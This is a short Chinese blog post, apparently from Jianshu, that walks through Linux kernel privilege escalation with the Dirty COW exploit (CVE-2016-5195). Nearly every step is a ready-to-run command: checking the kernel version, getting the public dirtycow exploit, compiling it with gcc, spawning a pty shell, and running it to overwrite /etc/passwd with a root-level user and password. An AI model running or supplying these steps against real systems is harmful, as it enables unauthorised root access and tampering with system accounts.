linux内核提权(脏牛CVE-2016-5195)

  • 漏洞范围:
    Linux kernel >= 2.6.22(2007年发行,到2016年10月18日才修复)
  • 查看版本信息
uname -a
uname -r
cat /etc/issue
cat /etc/*-release
1.jpg
  • 在脏牛的影响范围内,直接上传脚本
https://github.com/FireFart/dirtycow
  • 给脚本执行权限
chmod 777 dirty.c
  • 编译脚本
#利用gcc编译dirty.c文件
gcc -pthread dirty.c -o dirty -lcrypt
2.jpg
  • 切换交互式shell
 python -c 'import pty;pty.spawn("/bin/sh")'
  • 执行脚本
./dirty 123456  //(密码)
3.jpg
4.jpg
  • /etc/passwd 文件已经更改
firefart:123456  //用户名:密码
//利用之前最后做个备份  /etc/passwd
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容